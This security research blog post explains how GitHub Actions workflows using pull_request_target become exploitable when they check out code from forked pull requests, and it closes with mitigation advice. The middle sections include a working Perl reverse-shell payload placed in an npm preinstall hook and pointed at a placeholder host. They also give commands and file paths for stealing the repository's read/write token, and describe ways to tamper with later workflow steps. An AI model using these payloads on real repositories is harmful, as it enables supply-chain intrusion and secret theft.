Github Actions and the threat of malicious pull requests

March 13, 2021

12/04 update: I have put together a script which can be used to detect Github repos which have workflows that may be vulnerable here: https://gist.github.com/ndavison/d14dbbd9d015eeeef19b923ab80b1f1a. This can be tested against Github orgs or specific repos.

In my previous writeup, titled Shaking secrets out of CircleCI - insecure configuration and the threat of malicious pull requests, I covered a somewhat frighteningly easy way to accidentally configure CircleCI projects in a vulnerable state, allowing pull requests to be submitted that steal tokens and secrets stored within the settings of a CircleCI project. Because CircleCI has deep integrations with Github, and Github doesn't allow public repositories to disable pull requests, such vulnerable configuration would mean a malicious actor could submit a PR at any time of the day, steal the secrets, and clean up behind them, without any interaction required by the repo admins or maintainers.

In this writeup, I'm going to take this same threat - a malicious actor submitting a pull request with the intention of stealing secrets configured within a CI/CD pipeline - and show how it can be realised against a Github repository configured to use Github's own Actions feature. Like CircleCI, this is not a result of a vulnerability in the platform itself, but of vulnerable configuration by the repo owner.

One key attribute of the CircleCI research was the fact a project would only become vulnerable if it was configured in a specific way, as controlled by a private admin configuration UI. While my research outlined ways for blackbox testers to determine with reasonable certainty that a project was configured in a vulnerable state, there was no way to be absolutely sure without actually performing the attack - that didn't mean a project wasn't vulnerable, it just meant finding the needle in the haystack with some sort of finesse was a bit tricky. In contrast, the threat I'm going to outline in this Github Actions research can be confirmed with much more confidence, as Github Actions workflows are configured in the open (for public repos at least), allowing anyone to take a copy of the config and test privately without raising any alarms.

The making of a malicious pull request vulnerability

With CircleCI, the feature at the core of the vulnerable configuration was the ability to define what happens when a pull request from a forked repository is submitted against your repository. More specifically, it was the ability to define what happens with your pipeline's configured secrets - API keys, authentication tokens, and the likes - when it executes a pipeline as a result of a pull request from a fork. When someone internal to your Github org submits a PR to a repo, you may want your pipeline to be able to use such secrets to do something privileged, like publish a binary or bundle to a repository. The question then becomes, what happens when someone who isn't internal or privileged in your Github org submits a PR? usually you would not want anything privileged to happen and therefore shouldn't need any credentials, however the use case for doing something privileged is obviously prevalent enough for CircleCI to accommodate it, as the settings detailed in my writeup suggest.

This use case must have caught the attention of a product manager at Github as well, because Actions also supports the ability for pull requests from forked repos to trigger a pipeline with secrets provided. When Github first launched Actions in 2018, this was not the case (or at least, it wasn't intended to be) - in Actions terminology, the pull_request event and its variants were the only events that triggered on a PR being opened from a fork, and these events were made to not have access to repo secrets, including having access to a GITHUB_TOKEN value that is read-only. However, sometime later, in August 2020, the pull_request_target event was added. This event is given repo secrets and a full read/write GITHUB_TOKEN to boot, however there is a catch - this action only runs in the pull request's target branch, and not the pull request's branch itself. This differs from the CircleCI approach, which happily checked out the pull request's code when it was instructed to share secrets with PRs from forked repositories, including the pipeline configuration in the pull request.

What this means is, the pull_request_target event does not use anything from the fork PR at all when executing the workflow configured against that action, it simply executes the (presumably safe) code and configuration already in the base repo. So unlike CircleCi, a malicious actor can't just submit a PR with the pull_request_target Actions configuration file tampered with to do something nasty, as that code is never used during the pull_request_target workflow.

This sounds safe, and it is. The problem comes when people do something unsafe in their repo's pull_request_target configuration, which can basically be summarised as one crucial mistake: using actions/checkout to checkout the pull request's repo HEAD, and thus introducing potentially malicious code into the workflow. This mistake may sound unlikely, but it isn't exactly a rarity - I won't link to specific examples of vulnerable configurations in public repositories, but this Github code search may find some, or at least some very near misses that were probably just lucky to escape being vulnerable. Despite the fact Github do reference avoiding this mistake in their documentation for pull_request_target actions in a bright red box, you will likely have little trouble finding examples of repos making this mistake.

An example of vulnerable Github Actions pull_request_target configuration

While I won't link to a real world example of a vulnerable config, I will show what constitutes the bare minimal configuration to make a Github repo vulnerable to malicious pull requests using the pull_request_target action, and then breakdown what exactly makes it vulnerable. First, here's the example vulnerable configuration that allows an attacker to steal the secret secrets.SOME_SECRET:

name: my action
on: pull_request_target

jobs:
  pr-check: 
    name: Check PR
    runs-on: ubuntu-latest
    steps:
      - name: Setup Action
        uses: actions/checkout@v2
        with:
          ref: ${{github.event.pull_request.head.ref}}
          repository: ${{github.event.pull_request.head.repo.full_name}}
      - name: Setup Node
        uses: actions/setup-node@v1
        with:
          node-version: 12.x
      - name: Install dependencies
        run: npm install
      - name: some command
        run: some_command
        env:
          SOME_SECRET: ${{ secrets.SOME_SECRET }}

Before jumping in to specifics, the very first thing that enables this configuration to become vulnerable is the on: pull_request_target part - this means the workflow being run is given access to secrets and a full read and write Github token. So, before everything else, for a repo to be vulnerable, it must have a workflow configured to run on the pull_request_target event.

Now, onto analysing the vulnerable configuration. I will break it down in order:

The primary mistake is using the actions/checkout@v2 action to checkout the pull request's head, which it is doing with the ref: ${{github.event.pull_request.head.ref}} and repository: ${{github.event.pull_request.head.repo.full_name}} arguments. What this is effectively doing is configuring the workflow to now use the pull request's code for the rest of the workflow, which may be coming from a fork from a malicious actor.
With that mistake made, the configuration is now vulnerable to exploitation. However, it still needs a vector, or a "sink", for a malicious pull request to target with arbitrary code execution. Can you spot it? yep, it's the rather innocent looking npm install command. I'll expand on why exactly this is a problem shortly, but for now, just know that this is where malicious code in the pull request executes.
Now that the malicious code has had a chance to execute, any step run after it is compromised. The malicious code in this case may replace the binary some_command with something that reads the environment variables the workflow injects into the some command step, specifically $SOME_SECRET, and it's game over - the malicious pull request and hence malicious actor now has this secret.

To elaborate on the second point, the part where the malicious code is executed in npm install, this can be achieved by abusing the scripts feature with npm. This is because, inside a package.json file, you can define shell commands in the "scripts" that execute during the lifecycle of the npm install process. For example, while researching this writeup, I found the following perl reverse shell payload ($i is the IP and $p is the port for your netcat listener) from the PayloadsAllTheThings repo to work a treat on the Actions ubuntu-latest image, which I have inserted as a npm "pre-install" script:

...
"scripts": {
    "preinstall": "perl -e 'use Socket;$i=\"X.X.X.X\";$p=XXXX;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'"
}
...

Remember, while the malicious pull request can't modify the workflow configuration itself, it can take advantage of the fact the unsafe actions/checkout@v2 usage has checked out the potentially unsafe code that the rest of the workflow now uses, including the Install dependencies step in my example config. So all a malicious pull request needs to do is modify the repo's package.json file to include malicious code in one of the "scripts" hooks, and the npm install command later in the workflow will execute that malicious code. As mentioned in the last point, such malicious code could replace a binary used later in the workflow that is granted access to secrets, but the options don't stop there - I will cover some more exploitation options in the next section. At this stage, I will drive home one particular key point - in Github Actions, steps inside a job, while each their own process, all share the same filesystem. You would of course expect a CI/CD system to do this, but perhaps only for artifacts a stage produces for future stages such as a node_modules directory - not necessarily effectively the whole system, which appears to be how Actions works.

One thing to keep in mind is the npm install step itself is not being used incorrectly, it's just the fact this allows file changes in the pull request's code to influence the Actions workflow that makes it a good target. Here are a few examples of other exploitable execution sinks I have encountered in the wild, all of which were found in a vulnerable pull_request_target + unsafe code checkout workflow:

A faily common one is pip install -r requirements.txt or a similar pattern. This should allow an attacker to change which python packages are installed to point to one under their control, which should then allow for a post-install hook to be included in the malicious package's setup.py file.
One vulnerable workflow used an action that asked for a "build-script" as an input, which the action would execute on the workflow's checked out code as a npm script. So, just because the workflow may not have a npm install step in plain sight doesn't mean the npm install hooks defined in package.json don't execute during the workflow.
Workflows which execute a local script. This of course could be used in practically unlimited ways, but one example I saw a few times was a workflow which executed a local Gradle wrapper script, often like run: ./gradlew.
I have encountered Github actions repos (that is, code created to be used as an action in other workflows) that are themselves vulnerable, by having an otherwise vulnerable workflow with a uses: ./ step, presumably intending to test the action that the repo hosts, being used as an action. What this means is a malicious PR could simply change the action.yml configuation or change the script that the configuration already points to in its runs: value, to execute malicious code with access to the read/write repo token. Targeting an action repo like this may be of particular interest to a malicious actor, as compromise could mean compromising many other repos that use the action in their workflows.

These are just a few examples - the countless amount of actions available on Github from the community at large that you can import into your config means any one of them could offer a bespoke way to inject code in the PR which is executed by the workflow.

Finally, the last point to make on this example configuration is the secrets are only exposed because the malicious execution happens in the Install dependencies step before it. If the some command step was defined before the Install dependencies step, then it would be safe (this is partly why I chose npm install as an example, as it is something you would expect to occur early in the workflow). Other than the obvious chronological reason, this is also because each stage in a workflow has its own process, and so environment variables defined for one stage are not available to another. There is, however, one notable exception to this - if you define variables at the jobs: level, then those will be made available to all stages in the job, including of course the stage executing malicious code. Also, while not an environment variable, the read/write GITHUB_TOKEN value will be available from inside the workflow regardless of whether secrets are being referenced, which I'll expand on shortly.

How to take advantage of code execution inside a Github Actions workflow

Now that I've covered how a repo can configure a pull_request_target in a way that creates a malicious pull request vulnerability, and touched on certain sinks an attacker may use to execute their malicious code, what are some ways the code could target steps in the workflow that come after the malicious code executes, keeping in mind that all steps inside a job share a filesystem? here is what I came up with:

As already covered in the example vulnerable config, if a step uses a binary on the filesystem, malicious code could replace this binary with whatever it likes.
The /etc/resolv.conf or /etc/hosts file could be modified to manipulate DNS results in the execution environment. If a step is using TLS, this could be combined with compromised DNS by adding an attacker controlled CA to the environment's trusted CA's, which means a step's network requests could be manipulated to query an attacker controlled server. The runner user that Actions steps are executed as (in the ubuntu-latest image at least) has password-less sudo access, so basically any configuration file on the filesystem is fair game.
The runner user is also a member of the Docker group, so malicious Docker images can be added to the environment. This means any stage in the workflow which checks out a Docker image as an action could be compromised. This is because a workflow will create the Docker images before running any steps, so if malicious code replaces a Docker image that is used by a step later in the workflow with something else, the phony Docker image will be used instead.
Even actions themselves in the form of uses: actions/some_action@v1 can be replaced. Like Docker images, these are collected before any steps are executed and placed in the /home/runner/work/_actions/ filesystem location.
Or, if you don't actually care about interferring with a future step in the workflow, you could just steal the full read/write repo token from the filesystem. This lives in the git config file at /home/runner/work/xxx/xxx/.git/config on the step's filesystem, in the " extraheader" git configuration (or you could just execute git config --get http.https://github.com/.extraheader).

There are probably many more avenues to exploit, these are really just the obvious ones you tend to think of when a compromised filesystem is in play. It's worth reiterating that steps in a workflow are only vulnerable to being manipulated if they come after the step which executes the malicious code - so in the example vulnerable configuration, this would be the some command step only, as the malicious code runs in the Install dependencies step.

How to not be vulnerable

Really, the answer to this is simple - if you're using the pull_request_target event in Github Actions, don't use actions/checkout to then checkout the pull request's code. If you do, then you are opening yourself up to the malicious pull request attack.

If you must combine the two, then make sure you guard your configuration with conditions that only runs steps with access to secrets when the pull request being checked out in the workflow is trusted, whatever that means to you and your requirements. If you search Github, you will find configurations that use the if: feature to do something like this - be careful that your logic is not faulty and test, test, test. Use a non privileged account to fork the repo, and try and exploit it using the techniques covered.

In the CircleCI research, I placed a small amount of blame on CircleCI due to what I considered a strange UI which made it very easy to accidentally enable vulnerable configuration, however in case of Github Actions, it isn't about a clumsy UI or even a configuration API that is not safe by default, but perhaps about a slight focus on usability and features rather than security. The need for a pull_request_target event which has privileged access to the base repo seems strong in the open source community, and there's only so much a platform can do to prevent configuration mistakes like this, but the way in which the steps in Actions work means if any of them happen to leave the door open for an attacker, the whole workflow thereafter is compromised thanks to the sharing of a filesystem, which doesn't seem ideal from a security perspective. Then of course you have easy sudo access, Docker access, and the fact images and actions are downloaded prior to any steps, rather than collected at run time (which may have made them harder to replace).

All of this could be argued as an unfortunate side effect of a easy to use and flexible CI/CD platform, so perhaps detection is the next best option - detecting vulnerable Actions workflows is something that could be included in Github's automated security offering, like their service which notifies people when they commit secrets to public repos, or maybe it's something CodeQL could detect and notify for.

After I had done this research, but before publishing this writeup, the Github doco for pull_request_target was updated to include a link to a blog post covering this threat and some mitigation strategies (not to mention assigning this a cool vulnerability class name - pwn requests!). I didn't come across this blog post beforehand but, if I had, I may not have written this post, as frankly not a lot of what I covered here is adding much to that post, although bug hunters may find some value in my focus on how to potentially find vulnerable configs, and demonstrate impact.

As mentioned in my CircleCI writeup, please be considerate if testing for this vulnerability - pull requests on public Github repos are of course open for everyone to see, and sending in a malicious PR, even for a program with a mature bug bounty program, is potentially exposing the target to genuine malicious actors who could take advantage before the target has time to act. My CircleCI writeup has suggestions for reporting this vulnerability to programs based on my own experience of doing so, and with Github Actions, there is really no excuse - just copy the workflow config to your own private repo and test there to confirm the vulnerability.